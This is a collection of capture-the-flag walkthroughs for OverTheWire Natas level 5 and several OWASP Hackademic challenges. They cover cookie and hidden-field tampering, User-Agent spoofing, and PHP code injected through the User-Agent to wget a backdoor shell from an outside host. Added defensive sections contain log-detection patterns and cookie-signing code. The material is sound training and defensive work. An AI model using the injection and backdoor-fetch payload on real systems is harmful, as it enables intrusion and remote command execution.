OverTheWire: Natas Level 5 – #appsec #webapp #websecurity #wargames

Another day, another challenge…

In today’s blog post, we’re going to solve level 5 from the Natas wargame challenge.

Let’s begin.

Going to the following link and entering username of “natas5” and password of “iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq” we see the following:


After pressing “OK” we see:


Hmm… we see that we’re not logged in and access is disallowed.

Using Tamper Data, let’s see if the request headers show us a way to bypass the login feature.

Opening the Tamper Data application and refreshing the website we see:


Hmm… we see inside the Cookie header that there is a loggedin value that is currently set to 0. What if we change it to 1?

Changing the loggedin value to 1 and pressing Enter we see:



We received the flag!

OWASP Hackademic Challenge 9

Another day, another challenge.

Today’s post will be on the ninth challenge from the OWASP Hackademic Challenge.

Below is the scenario:

A friend of yours has set up a news blog at slagoff.com. However, he is kind of worried regarding the security of the news that gets posted on the blog and has asked you to check how secure it is.

Your objective is to determine whether any vulnerabilities exist that, if exploited, can grant access to the blog’s server.

Hint: A specially-tailored backdoor shell can be found at “http://www.really_nasty_hacker.com/shell.txt”.

Below is the solution:

Clicking the first link we are presented with the following screen:


Doing a right click, view page source we get the following:


We noticed there’s a hidden field with the value of answer.php, with a name of page. Hmm… let’s see if we can access this page.

Putting the following address in the URL bar it seems we cannot access the file.


From the description we know that we need to upload a file from http://www.really_nasty_hacker.com/shell.txt

We know that our page is using PHP. Let’s see if we can modify the User-Agent using PHP syntax.

Opening Tamper Data after we enter the comment we’re presented with the following:


Changing the User-Agent to:

<?system("wget http://www.really_nasty_hacker.com/shell.txt");?>

Pressing “OK” we get the following:


Our script was uploaded successfully!

Going to the new site we see the following:


Hmm… We’re presented with a command line similar to challenge 8!

Let’s do a ls to see what we have on the file system.


Well we see that there is a file named “sUpErDuPErL33T.txt”

Let’s see what’s in this file.


We’re presented with login information.

Looking back at the command file we see the following file adminpanel.php

Going to that file we see the following:


An admin portal!

Let’s enter our login information and see what we get:



We passed the challenge!!!

Lessons learned:

We did our right click, view page source, which showed that we had a hidden field referencing a file named answer.php. Trying to access this file didn’t help us. Next, by changing the User-Agent we were able to upload our file to the file system. Going to the file on the file system, we noticed that it allows us to execute commands. Executing commands, we were able to find the login information and log in successfully.

Use the knowledge you’ve learned to solve the next challenge. We were first introduced to user-agents in challenge #5 with the p0wnbrowser product. We know that we can change the user-agent to show content that we would’ve never noticed.
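From the defender's side, a request like the one above stands out in the web server's access log. The following is an added example, not part of the original challenge or post: it scans combined-format access log lines for User-Agent values that carry PHP code. The log lines, IP addresses and the `scan` function are constructed for illustration, and it assumes the server writes Apache-style combined logs with quotes escaped as `\"`.

```python
import re

# Apache/nginx "combined" format; the User-Agent is the last quoted field.
# Quotes inside a field are logged as \" so the pattern accepts escaped characters.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# A browser never sends a PHP open tag or a PHP execution call in its User-Agent.
SUSPICIOUS = [
    ("php-open-tag", re.compile(r"<\?(?:php|=)?", re.I)),
    ("php-exec-call",
     re.compile(r"\b(?:system|exec|passthru|shell_exec|eval)\s*\(", re.I)),
]

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2015:10:01:22 +0000] "GET /index.php HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Firefox/36.0"',
    r'198.51.100.7 - - [12/Mar/2015:10:02:03 +0000] "POST /index.php HTTP/1.1" '
    r'200 812 "-" "<?system(\"wget http://www.really_nasty_hacker.com/shell.txt\");?>"',
    '192.0.2.44 - - [12/Mar/2015:10:05:41 +0000] "GET /index.php HTTP/1.1" '
    '200 5120 "-" "p0wnBrowser"',
]


def scan(lines):
    """Return (ip, timestamp, matched rule names, user-agent) for flagged entries."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        ua = m.group("ua").replace('\\"', '"')  # undo the log's quote escaping
        rules = [name for name, rx in SUSPICIOUS if rx.search(ua)]
        if rules:
            hits.append((m.group("ip"), m.group("ts"), rules, ua))
    return hits


if __name__ == "__main__":
    for ip, ts, rules, ua in scan(SAMPLE_LOG):
        print(f"{ts} {ip} {','.join(rules)} UA={ua!r}")
```

Detection is the second line of defence here; the underlying fix is that a request header must never end up in a file or context the server interprets as PHP.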

OWASP Hackademic Challenge 10

Another day, another challenge…

Today’s challenge will conclude the Hackademic Challenge.

Below is the scenario:

Would you like to become an active hacker?
How about becoming a member of the world’s largest hacker group:
The n1nJ4.n4x0rZ.CreW!

Before you can join though, you’ll have to prove yourself worthy by passing the test that can be found at: http://n1nj4h4x0rzcr3w.com

If you succeed in completing the challenge, you will get a serial number, which you will use for obtaining the password that will enable you to join the group.

Your objective is to bypass the authentication mechanism, find the serial number and be supplied with your own username and password from the admin team of the site.

Clicking the link we see the following screen:


Doing a right click, page source we see the following:


Looking at the line above the password line we noticed that there is a hidden field called “LetMeIn” which is set to false. What if we set this to true?

Going back to our original screen, and clicking on Tools –> Web Developer Extension –> Forms –> Display Form Fields we see the following screen:


Changing the field from “False” to “True” and pressing the “Login” button we see the following:


Hmm… there’s an alert box that has encoding in it. Could this encoding contain the serial number?

Copying the encoding and going to Google we search for “Decoder online”. We found a website HERE

Changing the encoding type from Base64 to URL encoding and pressing “Decode” we see the following:


We have the serial number!

Going back to the challenge and pressing Enter we’re presented with the following screen:


Entering our name and serial number, and pressing the send button we see the following screen:


Lesson learned:

Our trick of right clicking and viewing the page source helped us. We noticed that there is a hidden field titled “LetMeIn”. Developers believe that just because a field is hidden, a penetration tester could not exploit it. This is far from the truth.

After we tampered with the hidden field, we next encountered encoded text. Doing a quick Google search we found an online encoder/decoder that we can use to decode it.

Once that decoding is done we entered our name and serial number on the next screen and we have completed the challenge.

OWASP Hackademic Challenge 7

Another day, another challenge.

In this post we will solve challenge 7 of the OWASP Hackademic Challenge.

Below is the scenario:

A good friend of mine studies at Acme University, in the Computer Science and Telecomms Department. Unfortunately, her grades are not that good. You are now thinking “This is big news!”… Hmmm, maybe not. What is big news, however, is this: The network administrator asked for 3,000 euros to change her marks into A’s. This is obviously a case of administrative authority abuse. Hence… a good chance for D-phase and public exposure…
I need to get into the site as admin and upload an index.htm file in the web-root directory, that will present all required evidence for the University’s latest “re-marking” practices!
I only need you to find the admin password for me…

Good Luck!

Clicking on the link we see the following:


Right clicking on the page we see the following:


We see that there is a folder named index_files. Let’s go to this folder and see what’s there…


Well look what we have here… there’s a lastlogin.txt, clicking on that file we get the following:


We see that Irene is a valid user. Let’s go back to the beginning and add Irene to the text box (with TamperData on) and see what we get.



Let’s press “OK”, and continue.


Reloading the page we now see the following in TamperData:


Well what do we have here? Inside the cookie we have the user of Irene and a userlevel of “user”. Let’s try to change the userlevel to admin and see if this will solve our challenge.


After pressing “OK” we get the following screen:


Lessons learned:

The page source provided gems in this challenge. When viewing the page source we noticed that there was a folder “index_files”. When accessing this folder we saw that information was improperly disclosed, showing the last login to the application. This is bad because another user (in this case us) can impersonate a valid user.

Once we checked the grade for our user “Irene” and looked at the Tamper Data results, we noticed there was a cookie header that showed that our user had a privilege level of user. We noticed that this value can be changed. After changing the privilege from user to admin we completed the challenge successfully.

When creating an application make sure that information is not being disclosed improperly. Make sure that there are no open folders that can be accessed on the website.
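Both the `loggedin` cookie in Natas level 5 and the `userlevel` cookie in this challenge were accepted by the server exactly as the browser sent them. The following added example, which is not code from either application, shows one way a server can detect such edits by attaching an HMAC to the cookie; the function names and the key are hypothetical and constructed for illustration.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo key (assumption); a real server loads a random secret
# from configuration that never reaches the client.
SECRET_KEY = b"constructed-demo-key-not-for-production"


def _sign(body: str) -> str:
    return hmac.new(SECRET_KEY, body.encode(), hashlib.sha256).hexdigest()


def _encode(state: dict) -> str:
    raw = json.dumps(state, sort_keys=True).encode()
    return base64.urlsafe_b64encode(raw).decode()


def issue_cookie(user: str, userlevel: str) -> str:
    """Serialize the session state and append an HMAC-SHA256 tag."""
    body = _encode({"user": user, "userlevel": userlevel})
    return f"{body}.{_sign(body)}"


def read_cookie(cookie: str):
    """Return the session dict, or None if the cookie is altered or malformed."""
    body, sep, tag = cookie.rpartition(".")
    # Constant-time comparison of the expected tag with the one presented.
    if not sep or not hmac.compare_digest(_sign(body).encode(), tag.encode()):
        return None
    try:
        return json.loads(base64.urlsafe_b64decode(body.encode()))
    except ValueError:
        return None


def tamper(cookie: str, **changes) -> str:
    """Simulate the header edit from the walkthrough: new fields, old tag."""
    body, _, tag = cookie.rpartition(".")
    state = json.loads(base64.urlsafe_b64decode(body.encode()))
    state.update(changes)
    return f"{_encode(state)}.{tag}"


if __name__ == "__main__":
    cookie = issue_cookie("Irene", "user")
    print(read_cookie(cookie))                              # accepted
    print(read_cookie(tamper(cookie, userlevel="admin")))   # rejected
```

Signing only detects tampering; keeping the login state and privilege level in a server-side session keyed by a random identifier avoids handing them to the client at all.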

OWASP Hackademic Challenge 5

Another day, another challenge…

What’s the challenge today? Challenge 5 of 10 from OWASP Hackademic.

Scenario below:

You need to get access to the contents of this SITE. In order to achieve this, however, you must buy the “p0wnBrowser” web browser. Since it is too expensive, you will have to “fool” the system in some way, so that it lets you read the site’s contents.

Walk through below:

Going to the website we get the following:


Viewing page source we see the following:


So… the page source is not helping us as there are no gems.

Let’s look at Tamper Data.
Reloading the page and pressing “Tamper” we get the following:


We don’t have any POST data to change, but we do have request headers that we can change. One field looks interesting: User-Agent.

The user-agent describes the type of browser that you are using. More can be learned about user-agent HERE.

What if we change the User-Agent to p0wnBrowser, since we are trying to trick the system into letting us view the contents? Changing the User-Agent we get the following:



Lesson learned:

In this case we did not have POST data to change, but we did have request headers on the GET request that we could change. Looking at the different headers, the User-Agent jumps out as the one to change. Once again, if you’re stuck, Google is the way to go!